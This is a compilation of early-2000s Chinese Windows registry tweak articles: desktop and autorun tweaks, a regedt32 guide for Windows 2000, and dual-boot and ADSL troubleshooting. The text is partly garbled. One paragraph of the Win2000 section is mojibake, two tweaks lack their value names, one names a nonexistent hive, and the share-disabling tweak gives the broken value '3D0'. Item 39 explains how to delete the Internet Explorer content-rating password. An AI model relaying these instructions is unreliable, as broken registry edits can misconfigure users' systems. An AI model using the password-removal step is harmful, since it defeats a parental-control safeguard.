2000-06-27 00:00:00· 生哥·yesky

--------------------------------------------------------------------------------
p>11 搜索“自启动”程序
位 置：HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
在注册表内，我们可以查询系统启动后加载了哪些程序。单击注册表内的目录树，这里最重要的是“装载源”，从“软件环境”、“启动程序”显示的结果看，绝大多数“自启动”程序都是通过注册表加载的，即“装载源”显示为“Registry （Machine Run）”的程序。

12 去掉“注销”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoLogOff
取 值：1为隐藏、0为显示

13 缩短“新建”选项
当你用鼠标右键点击资源管理器空白处，并选取新建菜单时，会弹出建立多种程序文件的菜单，但是里面有一些你可能并不常用，比如现在我要去除掉菜单中的“Wave Sound”项目，来缩短菜单。 打开注册表，请选择查看下的搜索项，然后输入“shellnew”，并选择“全字匹配”选项；在HKEY_LOCAL_MACHINE与HKEY_LOCAL_ROOT下进行查找，找到后将该其下面的shellnew子键删除掉即可。

14 清除配色方案
位 置：HKEY_CURRENT_USER\Control Panel\Appearance\Schemes
首先请找到该子键，在窗口的右边会出现系统自带的各种配色方案，将你认为无用的配色方案删除掉，一般只保留“Windows默认”一项。 然后再打开“控制面板”窗口中的“显示”，然后在“显示 属性”窗口中单击“外观”标签，在“窗口配色方案”下拉列表中进行查看。

15 修改桌面图标
例如，我们修改Windows桌面上“回收站”的名字及图标，可执行如下操作步骤。
位 置：HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
    先打开注册表编辑器；然后根据上面提供的位置找到该主键，双击窗口右边的“回收站”，弹出字符串编辑器， 然后在文本输入框内，将“回收站”改为“垃圾筒”， 重新启动机器后，桌面上的回收站就变成了垃圾筒，但图标依旧！单击{645FF040-5081-101B-9F08-00AA002F954E}前面的“+”，则展开这个主键，在它下面还有一个子键DefaultIcon。然后单击此子键，在右窗格中的“数据”栏下将出现三个图标文件名，分别为“$#@60;未命名$ 2;”、“Full”（满）、“Empty”（空）的回收站图标，这三个图标包含在动态链接库Shell32.dll文件里面，图标资源所在的序号分别是31、31、32， 其数据格式是“C:\Windows\System\Shell32.dll,31”等（调用动态链接库中的图标资源，采用这种格式就可以啦！）。如果您想把它改成自己的图标，则只要将此数据改为自己图标或者动态链接库即可，例如使用图标文件为“C:\Windows\help.ico”，这样再重新启动机器就可以看到垃圾筒的图标被改变了。利用同样的方法可以修改桌面上其它的图标和文字。

16 删除“系统”
    当你想删除桌面上的“回收站”、“Internet Explorer”等图标时，会发现它们不能用一般的方法删除。这时还可以通过修改注册表来办到。
位 置：HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace在该分支下面有多个子键，这些子键将对应桌面上的“系统”图标，在窗口右边你就可以看到。删除不需要的图标，即对应的键值；重新启动后，会看到桌面上的一些图标不见啦！

17 隐藏桌面
位 置：HKEY_CURRENT_USER\Software\Microsoft
\Windows\CurrentVersion \Policies\Explorer
键值名：NoDesktop
取 值：0、1
    这种隐藏桌面图标的方法与简单地在“显示 属性”窗口内，使用“Active desktop”下的隐藏图标的方法不一样。这里的隐藏除了将图标隐藏外，连整个桌面都一并隐藏了起来，并且同时禁止了在桌面上点击鼠标右键功能。

18 去掉“网上邻居”
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoNetHood
取 值：1为隐藏、0为显示

19 关闭系统版本号
位 置：HKEY_CURRENT_USER\Control Panel\desktop
键值名：PaintDesktopVersion
取 值：0为隐藏、1为显示
说 明：它能把你的Windows的版本号在桌面的右下角显示出来，如果你使用的是测试版， 那么就可以将桌面右下角的文字去掉。

20 隐藏指定驱动器
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名：NoDrives
取 值：需要说明一下，在这里使用的是2的N次方来代表一个驱动器名称，而非寻常的A、B、C、D……，下面就给出各驱动器名与2的N次方的对应关系，以方便读者：A: 1, B: 2,C: 4, D: 8, E: 16, F: 32, G: 64,H: 128, I: 256,J: 512,K: 1024, L: 2048, M: 4096, N: 8192,O: 16384, P: 32768, Q:65536,R: 131072,S: 262144,T: 524288, U: 1048576, V: 2097152, W:4194304,X: 8388608, Y: 16777216, Z: 33554432按照上面的取值规则，如果你要隐藏A、B、C三个驱动器，输入7即可，因为7=1+2+4，如果你要隐藏所有驱动器，输入67108863。

注册表修改指南（三）
2000-06-27 00:00:00· 生哥·yesky

--------------------------------------------------------------------------------
p>21 修改“回收站”
位 置：HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
键值名：Attributes
取 值：40 01 00 20、70 01 00 20
说 明：缺省情况下是40 01 00 20，把它改为70 01 00 20后，就可以把桌面上的“回收站”象资源管理器内的文件一样，能任意地更名或者删除了。

22 修改桌面
位 置：HKEY_CURRENT_USER\ControlPanel\desktop
说 明：打开注册表编辑器，然后打开该分支。在此分支右窗格内可以看到一些项目，现介绍几个如下：HungAppTimeout：这是指一个应用程序出错时试图等待响应的时间，值为毫秒，缺省值为5000毫秒(即5秒)，可以减少为3000毫秒，以加快系统的响应能力。MenuShowDelay：这是指“开始”菜单中当鼠标指向一个具有下级 菜单的菜单项时等待出现下级菜单的延迟时间，单位也是毫秒，可以设成100，即等待0.1秒就会出现（前面已经提到过）。ScreenSaveActive：这是现在屏幕保护功能是否可用，值为0或1，0即为不用屏幕保护功能，1为可用，但必须你已经使用了屏幕保护功能。ScreenSaveTimeOut：这是指屏幕保护的延时，值类型为一个数值。单位是秒，最小值是60秒，但必须你已经使用了屏幕保护功能；如果你将数值改为1，那么每停顿1秒钟，便会启动屏幕保护。WaitToKillAppTimeout：这是指当按下 Crtl+Alt+Del后以后，出现“关闭程序”对话框，出现提示“结束任务”、“等待”时选择“等待”的等待时间，单位是毫秒，默认值是10000。可以减少等待时间。

23 定制按钮颜色
    尽管Windows在外观中可以定义多种窗口显示方案,但要定义某一个部位的颜色，如将黑色的按钮字体改变为其它的颜色， 它就无能为力啦！通过修改注册表能很容易实现。 在注册表内找到HKEY_CURRENT_USER\Control Panel\Colors的子键，然后将窗口右边的“Bottontext”键值由原来的“0 0 0”改为“255 0 0”（代表红色）。

24 汉字后加空格
位 置：HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion
键值名：插空格
取 值：0不插入空格、1插入空格

25 活用Enter键
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVer n键值名：
取 值：0保留原功能，输入法不处理、1等同于Esc键，用于清除当前外码输入状态说 明：当取值为1时，如果有候选窗口，会自动隐藏输入窗口，清除所有外码，但不隐藏外码输入窗口。当无候选窗口，清除外码，并隐藏外码输入窗口。

26 活用Space键
位 置：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion键值名：
取 值：0指明这是作为结束外码输入的标志键，这种设置适合于形码、1指明这是作为候选选择键，这种设置适合于音码。

27 系统时间格式
位 置：HKEY_CURRENT_USER\ControlPanel\International键值名：sTimeFormat
取 值：H:mm:ss、HHmm不等
说 明：在通常情况下，Windows在任务栏中使用“23:12”的时间格式来显示时间， 但是您可以通过修改注册表编辑器来更改此时间格式。

28 更改登录背景
位 置：HKEY_USERS\.DEFAULT\Control Panel\Desktop
键值名：Wallpaper
取 值：目标背景图文件路径

29 修改注册码
位 置：HKEY_LOCALMACHINE\Software\Microsoft\Windows\CurrentVersion
键值名：ProductId
取 值：任意字符

30 禁止自动运行
    在通常情况下，绝大多数在Windows启动时自动运行的应用程序有如下两种设置办法：在“启动”程序组中添加快捷方式 如果使用的是这种方法。则我们只需将它们的快捷方式从 “启动”程序组中删除即可达到禁止它们自动运行的目的。修改Windows的注册表数据库如果您使用过一些诸如CD播放机等的用户都知道，在使用这些软件时，都将在任务栏右边 将出现一个图标，这有时会带来不便。其实，这些软件的自启动程序的注册项放在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run分支中。您只要到此分支中找出对应的自启动程序即可，另外，在“Run”主键下还可能有“SysExplr”子键。如果有该子键，可以将其中的内容清空，同样也能取消Windows启动时自启动的程序。那么反过来，我们怎样在注册表内添加自启动程序呢？先找到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run主键，然后在它的窗口右边建立一 个名为“SysExplorer”的键值名，并将其值设为“Explorer.exe”，退出注册表编辑器，注销用户后重新启动计算机，系统将自动运行资源管理器。 另外Windows还提供了一次性的自启动功能。紧跟在“Run”主键后面有一个“RunOnce”和“RunOnceEx”子键，你可以在这两个子键内设置新的键值，让系统自动运行一次某个程序，即仅在下一次启动Windows时才有效。

注册表修改指南（四）
2000-06-27 00:00:00· 生哥·yesky

--------------------------------------------------------------------------------
p> 31 软件显示乱码
     解决的方法是在注册表内找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\fontassoc\Associated CharSet位置，将窗口右边内的“SYMBOL(02)” 键值（这是系统的机内码）改为“NO”即可。

32 删除软件的残骸
    每一个Windows操作系统的的使用者可能都有这样的经历，由于种种原因直接在硬盘中删除了某个文件夹，或者是在“添加／删除程序”里面对一些软件进行反安装。但是有些程序却还有注册信息留在注册表内，当你再次从“添加/删除程序”中卸载该程序时，老是提示“试图删除XXXXXX时出错，放弃卸载”，从而导致了卸载程序错误。当机器中安装大量的软件后随着时间的后移，就在系统的注册表中就形成了垃圾，影响了机器的运行速度。下面介绍彻底清除这些垃圾的方法。用注册表编辑器来清除注册表中关于卸载应用程序的相关键值数据HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall位置，一般的软件在注册表内的反安装子键里有“DisplayName”、“UninstallString”这两个键值，第一个显示的是软件的名称、第二个 显示的是反安装的一些信息。双击第二个键值后，便会明白反安装是怎么回事，反安装实际上是你所安装的软件自带有一个反安装程序，在安装该软件时，它会自己记录一些安装信息存放Install.log文件中，卸载时用这个反安装程序再带上.log文件的参数即可。另外，有些软件反安装时使用的是系统提供的反安装程序。再如，许多应用软件在卸载之后仍会在注册表文件内留下一些无用信息。比较集中的地方在HKEY_LOCAL_MACHINE\Software、HKEY_CURRENT_USER\Software和HKEY_USERS\.Default \Software。这几项里面的内容基本上一致，在其中一处作查找删除就行了。比较常用到的方法是进入HKEY_LOCAL_MACHINE\Software分支中，然后重点查找那些已经确信被安全卸载了的软件的残留信息，在确认无误后删除。

33 恢复CD Key
    如果你不小心将Windows的CDKey丢失了，担心在以后需要安装系统时会遇到什么麻烦。我该如何才能找回它呢？您可以从NT的注册表中找到这个CDKey。打开注册表，然后再找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microso WindowsNT\CurrentVersion”位置，在右侧的ProductId键值中，就包含了CDKey的信息，另外，如果您所使用的NT是OEM版本，则有可能整个ProductId的串值就是CDKey！

34 加入登录信息
    因为加入这样的功能需要修改NT的注册表，所以请您小心并做好备份。首先在注册表中的找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon子键，然后在窗口右边找到“LegalNoticeCaption”和“LegalNoticeText”两个键值。如果没有， 请添加这两个键值。然后在这两个键值内分别输入“这是我的服务器”、“欢迎光临！”。关闭注册表，重启机器，这次您就看到在登录窗口之前，将会出现一个新的窗口，包含上面您所输入的这两条信息。

35 防范非法入侵
    介绍如何防止本地用户非法入侵 Windows NT 系统的文章已经并不少见，但如何防范远程用户呢？当然，一般的做法是，可以在用户拨号进入系统（或通过局域网进入系统）时限制其对文件的访问权限，以达到保护文件的目的。但毕竟这种安全级别不够高，如何能将这些用户锁在系统的门外，以达到绝对安全的目的呢？NT为驱动器和系统目录创建默认共享的目的，是为了使系统管理员、备份程序和其他授权用户及服务性工作能顺利访问其他个人用户的文件。当其他用户访问您的系统时这些共享对象并不显现出来。但是任何一个远程 用户只要知道这些共享对象的确切名称，并且有访问权的话，他就可以与这些共享对象建立连接。令人遗憾的是，NT系统的安全机制非常脆弱。虽然SecurityPack5的出台为老用户提高到管理员水平而提供了一些补漏措施，并且还 有一些NT的安全检查方法，但仍然还会有其他漏洞存在。所以如果您的计算机在局域网上，或者是通过Modem连接 上网的，那么可通过取消这些组件的共享来保护数据。 为了达到此目的，打开NT的注册表编辑器。在注册表编辑 器中，将当前目录定位在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\lanmanagerserver\parameters，如果没有AutoShareWks键值名，那么请你新建立一个；然后再双击它并输入“3D0”，最后单 “确定”按钮、关闭注册表编辑器，然后重新启动计算机。

36 ICQ中有“漏洞”
    ICQ是由以色列一家叫Mirabilis的公司出品的网络软件，其作用是为Internet上的用户提供实时的信息传递服务。有了它，你就可以同千里之外的朋友交流信息，还可以在对方不在线的情况下“呼叫” 他（她）上线，难怪广大网友都亲切地叫它“网络寻呼机”。但是，你是否知道在ICQ for Windows版本中 有一个“漏洞”。ICQ在Windows注册表中有一个键值被称为“Auto Update”（自动更新）。如果该键值被设 置成“Yes”，那么每一次登录到服务器的时候，就会将你的计算机中一些重要信息发送到登录的服务器上。 这些信息包括：你正在使用的操作系统类型、版本、序列号、用户登记名称、公司名称、所使用的浏览器版本等等。这些重要信息的发送可能会被黑客或某些别有心的人所利用，给你带来不必要的麻烦。为了避免此问题的发生可采用修改注册表关掉ICQ的“自动更新”功能。首先在注册表内找到 HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs位置，并在窗口右边找到“Auto Update”键值； 将“Auto Update”键值由“Yes”修改为“No”即可。为了你系统的稳定性，在进行修改时请注意要在关闭ICQ 应用程序的情况下进行修改。修改完毕后，请重新启动计算机。

37 增加执行文件路径
    如果需要运行的程序不在指定的目录中，则DOS系统一般采用在自动批处理文件中设置路径的方法来达到自动寻找此程序的目的；在Windows中则可以更秘密地增加程序路径，而不是通过设置自动批处理的方式，这就需要通过修改注册表来实现上述目的。 比如要为“C:\ProgramFiles\pdoc\pdoc.exe”文件增加路径。先打开注册表，然后找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\AppPaths的位置，在窗口右边新建一个名为“pdoc.exe”的主键，选择该主键，将其默认值设为“C:\ProgramFiles\pdoc\pdoc.exe”；再新建名为“Path”的主键，将其设为“C:\ProgramFiles\pdoc”。这样就可以通过在“运行”命令行中键入“pdoc.exe” 或“pdoc”来运行该程序了。另外你还可以为已经存在的程序设置新的主键，比如可以为MicrosoftWord 97添加名称为“Word.exe”的主键。假设Word 97安装在“C:\ProgramFiles\MicrosoftOffice\Office\”目录中，则其操作为：打开注册表，在“我的电脑”文件夹中依次选择“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\AppPaths”，新建名称为“Word.exe”主键，选择该主键，将其默认值设为“C:\ProgramFiles\MicrosoftOffice\Office\Winword.exe”即可，建立执行目录的方法与上例一样。

38 更改系统安装目录
    如果使用光盘安装Windows，当添加新的硬件时，系统配置驱动程序时会提醒需要在光驱中插入Win 98光盘，而且每次都 要这样做，的确太麻烦了。您可以将Win 98安装盘中的所有“*.CAB”文件都拷贝到硬盘的某个目录下，比如“D:\Backup\PWin98”，然后运行注册表编辑器，在“我的电脑”文件夹中依次选择“HKEY_LOCAL_MACHINE”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Setup”，将“SourcePath”主键的值改为“D:\Backup\PWin98\”，
重新启动计算机即可。 如果网络上有一个文件服务器，假定Win98安装盘备份在“D:\Backup\PWin98\”目录中，文件服务器的机器名为“MMX233”，D盘共 享名为“DiskD”，则将“SourcePath”主键值改为“\\MMX233\DiskD\Backup\PWin98\”，注销用户或重新启动Windows即可。

39 去掉IE内的分级审查口令
    首先找到在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Currentversion\Policies\Ratings位置，这里保存的是IE下“Internet属性”对话框的“内容”选项页中的“分级审查”中的口令，该口令是经过加密的，在下图中你可以看到记录该口令的有两个键值，而二进制的“key”键值则是加过密的，去掉口令的方法即是将子键下的这两个键值删除，如果没有口令，这个子键无键值。下次进入IE，你就可以安全地进入分级审查，并且可以直接跳过输入“旧密码”，直接加入密码即可.

40 设置中文Windows内的系统语言
    如果你安装了一个英文游戏，并且不支持中文，例如QUAKE。就可以将中文Windows内的汉字按照英文一样来处理。比如每个汉字都被当成了两个字符来处理，删掉一个汉字也需要按两下删除键，而且每到行末，就会出现汉字丢掉一半的奇怪现象。如果遇到这样的情况，千万别着急重新安装Windwos，你还可以先试一试下面的方法。首先在注册找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Nls\Locale的位置，将原来的“00000804”改为默认的“00000409”（系统默认使用的语言系统）.

注册表修改指南（五）
2000-06-27 00:00:00· 生哥·yesky

--------------------------------------------------------------------------------

41 更改IE标题栏中的文字
    首先在注册表中找到下面的位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main，然后再新建一个字符串值，将其命名为Window Title
(注意两个词中间有一个空格）.

42 如何删除多余的DLL文件
    在WIN98的System子目录下存有大量的DLL文件，这些文件可能被系统或应用程序共享。但是由于经常安装和卸载软件，就会在System目录下留下一些DLL垃圾文件。它们不但占用了硬盘空间，而且还降低系统的运行速度。删除它们的步骤如下：
    1．运行“REGEDIT”， 打开注册表编辑器。
    2．打开
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedDLLs分支。
    这里SharedDLLs子键记录的就是有关程序共享的DLL信息，每个DLL文件的键值说明它已被几个应用程序共享。如果是二进制键值为“00 00 00 00”，则表明不被任何程序共享。（另外“0x00000001 （1）”是十六进制表示法）
    3．System目录中删除对应的文件。

43 去掉桌面快捷方式的小箭头
    在一些程序的安装过程中，会自动在桌面上创建该程序的快捷方式，方便了我们的使用。但是那个小箭头不太好看。我们可以利用修改注册表来去掉它。首先要注意此快捷方式是什么类型的，一般说来以.LNK居多，也有一些是.PIF（指向MS－DOS程序的快捷方式）。具体步骤如下：
    1．运行注册表编辑器，打开HKEY_CLASSES_ROOT\lnkfile分支。
    2．在lnkfile子键下面找到一个名为“IsShortcut”的键值，它表示在桌面的.LNK快捷方式图标上将出现一个小箭头。右键单击“IsShortcut”，然后从弹出的菜单中选择“删除”，将该键值删除。
    3．关闭注册表编辑器，重新启动Win98，就可发现快捷方式图标上已经没有小箭头了。
    同理，对指向MS－DOS程序的快捷方式（即.PIF）图标上的小箭头，则除了是打开HKEY_CLASSES_ROOT\piffile分支外，其余同上。


注册表由来

《一键清理系统垃圾》

注册表由来

2000-06-20 00:00:00· 生哥·yesky

--------------------------------------------------------------------------------
p align="left"> PC机及其操作系统的一个特点就是允许用户按照自己的要求对计算机系统的硬件和软件进行各种各样的配置。早期的图形操作系统，如Win3.x中，对软硬件工作环境的配置是通过对扩展名为.ini的文件进行修改来完成的，但INI文件管理起来很不方便，因为每种设备或应用程序都得有自己的INI文件，并且在网络上难以实现远程访问。
为了克服上述这些问题，在Windows 95及其后继版本中，采用了一种叫做“注册表”的数据库来统一进行管理，将各种信息资源集中起来并存储各种配置信息。按照这一原则，Windows各版本中都采用了将应用程序和计算机系统全部配置信息容纳在一起的注册表，用来管理应用程序和文件的关联、硬件设备说明、状态属性以及各种状态信息和数据等。

与INI文件不同的是：
1.注册表采用了二进制形式登录数据；
2.注册表支持子键，各级子关键字都有自己的“键值”；
3.注册表中的键值项可以包含可执行代码，而不是简单的字串；
4.在同一台计算机上，注册表可以存储多个用户的特性。

注册表的特点有：
1.注册表允许对硬件、系统参数、应用程序和设备驱动程序进行跟踪配置，这使得修改某些设置后不用重新启动成为可能。
2.注册表中登录的硬件部分数据可以支持高版本Windows的即插即用特性。当Windows检测到机器上的新设备时，就把有关数据保存到注册表中，另外，还可以避免新设备与原有设备之间的资源冲突。
3.管理人员和用户通过注册表可以在网络上检查系统的配置和设置，使得远程管理得以实现。

我们在前面已经详细介绍了注册表的由来与基本结构。发现注册表比较复杂，但又安排得非常有条理，能有效地提高工作效率，为系统的维护提供了必要条件。由于注册表是一个二进制的配置数据库文件（Windows的命根子），因而，用户无法直接存取注册表。为了让高级用户能够编辑注册表,Windows2000提供了注册表编辑器“c”和“Regedt32”。对这种只使用Windows提供的注册表编辑器进行编辑的操作。

编辑器在安装Windows时已经被安装到硬盘中了，但是并未在“附件”程序组中建有快捷方式。用户如果需要使用注册表编辑器，可以在“运行”对话框内输入Regedt32或Regedit即可打开注册表编辑器，如图：

    或者在“命令提示符”中执行Regedt32.exe也可以进入注册表编辑器，
    如图：

后面的内容将介绍注册表编辑器的使用方法，如创建删除主键、子键以及键值等，同时还将给出一些修改注册表的实例。
win2000注册表
2000-06-10 00:00:00· 河北　秋水·YESKY

--------------------------------------------------------------------------------
p> Windows注册表概述
    注册表是Windows系统存储关于计算机配置信息的数据库，包括了系统运行时需要调用的运行方式的设置。Windows注册表中包括的项目有：每个用户的配置文件、计算机上安装的程序和每个程序可以创建的文档类型、文件夹和程序图标的属性设置、系统中的硬件、正在使用的端口等。
    注册表按层次结构来组织，由项、子项、配置单元和值项组成。注册表中包括如下各项：
    ●HKEY_CURRENT_USER：包含当前登录用户的配置信息的根目录。用户文件夹、屏幕颜色和“控制面板”设置存储在此处。该信息被称为用户配置文件。
    ●HKEY_USERS：包含计算机上所有用户的配置文件的根目录。HKEY_CURRENT_USER是HKEY_USERS的子项。
    ●HKEY_LOCAL_MACHINE：包含针对该计算机（对于任何用户）的配置信息。
    ●HKEY_CLASSES_ROOT：是HKEY_LOCAL_MACHINE\Software的子项。此处存储的信息可以确保当使用Windows资源管理器打开文件时，将使用正确的应用程序打开对应的文件类型。
    ●HKEY_CURRENT_CONFIG：包含本地计算机在系统启动时所用的硬件配置文件信息。
    对于注册表的修改，需要使用专门的编辑器完成，在Windows中为我们提供了这个工具。而在Win2000中微软新提供了一个针对多用户系统的注册表编辑器，这就是我们本期将主要介绍的内容。
    在此要特别强调一点：一般来讲注册表不须要用户自己修改，因为其中包括了Windows启动和运行所必须的全部配置，错误的设置将会导致应用程序无法运行、系统出错，直至系统崩溃或无法启动。如果需要对注册表进行编辑，务必事先进行注册表项目备份！
Win2000中的注册表编辑器
    在Win2000中，系统提供了两个注册表编辑工具，一个是从Win9x延续下来的，一个是新版本操作系统提供的。在此我们要介绍的是后者。
    1.程序的启动
    单击系统开始按钮，在关联菜单中选择“运行”命令，激活相关界面。在其中的文本框中输入“regedt32”，并击回车键确定，即可启动程序，其界面形式如图1所示。
    2.向注册表中添加新的项或子项
    如果需要将一些系统运行设置添加到系统注册表中，而这些信息又不是以＊.reg格式提供的，此时只能使用注册表编辑器完成，具体步骤如下：
    启动程序，在程序左边的树形列表窗口中选择将在其下添加新项的项或子项。单击程序界面菜单条中的“编辑 睿⒋庸亓南吕说ブ醒≡瘛疤砑酉睢泵睿耸被岢鱿秩缤?所示界面。
    在图2所示窗口中的“项名称”文本框中输入需要添加的新项名称，对于指定类别，可根据自己的需要设置，当然如果不添加也可以。最后单击确定按钮，返回程序界面即可。
    如果需要在HKEY_USERS或HKEY_LOCAL_MACHINE主项中添加新的内容，方法有所不同，此时“编辑”菜单中的“添加项”命令是不允许使用的。正确的添加方法是：单击程序界面菜单条“文件”项下拉菜单中的“加载配置单元”命令，程序会给出一个列表框，在其中选择需要加载的对象，之后单击“打开”按钮，程序会给出“加载配置单元”对话框，在其中输入新建项目名称，之后单击确定按钮即可。在此需要说明的是，加载配置单元主要用于在不同的机器中传递注册表配置，对于配置相同的机器庋梢越谑∠低撑渲檬奔洹?br> 　　3.给注册表的值项赋值
    所谓值项，就是注册表中的含数据字符串的子项，这个设置以字符串方式体现，常见的设置取值包括二进制数值和字符串明码以及DWORD（双字节）值方式。给值项赋值的具体步骤是：首先在注册表编辑器界面左边窗口中选择需要赋值的项或子项，从程序界面菜单条“编辑”项下拉菜单中选择“添加数值”命令，此时会出现如图3所示界面。在其中的“数值名称”文本框中输入需要创建的值项（子项）名，在“数据类型”下拉文本框中选择赋值类型，其中各列表项的含义为：
    ●REG_BINARY：二进制值；
    ●REG_DWORD：DWORD值；
    ●REG_EXPAND_SZ：可扩展字符串；
    ●REG_MULTI_SZ：多重字符串；
    ●REG_SZ：数据字符串。
    根据自己的需要选择，之后，单击确定按钮。注意，选择的赋值类型不同，程序会给出关联的设置界面，在其中设置具体取值，之后进行确定就可以了。
    如果需要修改或编辑值项的赋值，可使用鼠标双击程序界面右边窗口中的赋值列表项，程序会给出相应的赋值编辑器，在其中进行编辑或修改即可，非常简单。
    4.以关键字方式查找
    由于注册表中包括的项目非常多，当需要从中定位自己需要的项或子项时，使用查找功能是非常必要的。该项功能的具体用法如下：首先在程序界面中选择需要扫描的项或子项所在窗口，单击界面菜单条“察看”项下拉菜单中的“搜索项”命令，此时会出现如图4所示界面。在“查找内容”文本框中输入需要查找的内容关键字，并选择相应的扫描控制方式，之后，单击“查找下一个”按钮确定即可。
    5.删除注册表中无用的子项或值项
    虽然现在的应用程序都设计有自动卸载功能，但是多数程序并不能完全将自己在注册表中添加的项目删除，这也会导致注册表日益增大，时间长了会导致系统运行变慢等不良现象发生。如果你大致了解注册表的组成，可以将这些无用的设置从注册表中删除，当然这项操作具有一定的风险，使用前应该备份注册表数据文件。对于删除注册表中的项目，非常简单：首先在程序界面中找到需要删除项目所在的主项窗口，然后定位需要删除的值项，一般对于软件注册项都包括在HKEY_CURRENT_USER项下的Software子项中。单击程序界面菜单条“编辑”项下拉菜单中的“删除”命令或者是直接按下“Delete”键，程序会给出删除确认对话框，单击“Yes”按钮确认即可。
    此外，对于配置单元项，是不能直接删除的，须要按照如下方法操作：选择需要删除的配置单元列表项，之后从程序界面“文件”下拉菜单中选择“卸载配置单元”命令。
    6.保存注册表项目
    对于保存注册表项目，可按以下步骤操作：首先在程序界面中选择需要保存的注册表项目对象，之后从界面“文件”下拉菜单中选择“保存项”命令，程序会给出相应的对话框，在其中设置保存文件的文件名、保存路径，对于文件类型，应设置为“所有文件”，之后，单击界面中的“保存”按钮即可。由于Win2000的注册表编辑器根据不同的项给出了单独的窗口，所以，对于完整的保存注册表，须要依次保存相应的项。
    7.还原注册表项目
    对于还原注册表项目，我们可以理解为恢复注册表项目的备份设置，或者是还原注册表项目。使用该项功能的前提是以前我们对注册表项目进行了备份。该项功能的使用方法非常简单：首先选择需要还原的项目所在的项显示窗口，单击程序界面“文件”项下拉菜单中的“还原”命令，程序会给出一个对话框，在其中的文件列表窗口中选择需要还原的文件名，之后单击“打开”按钮确定即可。
    在此要提醒的是，对于项目还原操作，将使用备份的注册表项完全替代当前注册表中原始位置的全部配置，而且会将当前注册表中需要还原位置的全部配置删除。
    8.注册表的打开与关闭
    当注册表编辑器启动后，程序会自动打开本机的注册表，以供编辑。不过作为Win2000提供的工具，程序提供了关于编辑远程计算机注册表功能，不过我们可以打开的项目限制为HKEY_USERS和HKEY_LOCAL_MACHINE。对于本地注册表窗口的关闭，可从“文件”项下拉菜单中选择“关闭”命令即可。
    对于打开远端计算机的注册表，可以从“文件”项下拉菜单中选择“选择计算机”命令，在其中的计算机列表框中选择需要访问的机器名称，之后单击打开按钮确定即可。
    9.设置注册表项的权限
    设置权限是有效的保护注册表项目的重要方法，使用此项功能可以指定能打开该项的用户和组。以下给出具体设置步骤：首先在程序界面窗口中选择需要指定权限的项，单击界面“安全”项下拉菜单，从中选择“权限”命令，在“名称”列表框中选择需要设置权限的用户或组，如果暂时还没有添加，可单击“添加”按钮，在关联的“选择用户、计算机或组”设置界面中选择需要添加的对象。在界面中的“权限”项列表框中设置允许当前选择对象的使用权限，其中包括只读和完全控制（读写）。如果要给子项指派权限，并希望指派给父项的可继承权限能够应用于子项，请选中“允许将来自父系的可继承权限传播给该对象”复选框。此外，如果单击界面中的“高级”按钮，程序会给出针对当前授权注册表项访问控制设置，其中包括了更加严密的授权设置，如是否允许查询数值、设置数值、创建子项、枚举子项、通知、创建链接、删除、写入DAC、写入所有者、读取控制等，根据自己的需要选择即可。


专家答问1

《一键清理系统垃圾》

专家答问1

2000XP双系统启动问题

先装好了WindowsXP，然后再安装Windows 2000。开机后发现Windows XP的滚动条消失后，电脑即黑屏，无法进入登录画面。

    其实，这个问题是因为当安装好Windows 2000后，某些系统文件从高版本变回低版本，因此导致Windows XP无法识别。解决这个问题很简单：从Windows XP安装光盘中将I386目录中的NTLDR、DOSNET.INF复制到C盘根目录下替换现有文件即可。

    提示：安装多操作系统时，遵循Windows 98→Windows 2000→Windows XP→Windows 2003的顺序，就不会出现系统间互相“干扰”的问题。

ADSL拨号中出现的错误代码

Error 602 The port is already open

问题：拨号网络网络由于设备安装错误或正在使用，不能进行连接

原因：RasPPPoE没有完全和正确的安装

解决：卸载干净任何PPPoE软件，重新安装

Error 605 Cannot set port information

问题：拨号网络网络由于设备安装错误不能设定使用端口

原因：RasPPPoE没有完全和正确的安装

解决：卸载干净任何PPPoE软件，重新安装

Error 606 The port is not connected

问题：拨号网络网络不能连接所需的设备端口

原因：RasPPPoE没有完全和正确的安装，连接线故障，ADSL MODEM故障

解决：卸载干净任何PPPoE软件，重新安装，检查网线和 ADSL MODEM

Error 608 The device does not exist

问题：拨号网络网络连接的设备不存在

原因：RasPPPoE没有完全和正确的安装

解决：卸载干净任何PPPoE软件，重新安装

Error 609 The device type does not exist

问题：拨号网络网络连接的设备其种类不能确定

原因：RasPPPoE没有完全和正确的安装

解决：卸载干净任何PPPoE软件，重新安装

Error 611 The route is not available/612 The route is not allocated

问题：拨号网络网络连接路由不正确

原因：RasPPPoE没有完全和正确的安装，ISP服务器故障

解决：卸载干净任何PPPoE软件，重新安装，致电ISP询问

Error 617 The port or device is already disconnecting

问题：拨号网络网络连接的设备已经断开

原因：RasPPPoE没有完全和正确的安装，ISP服务器故障，连接线，ADSL MODEM故障

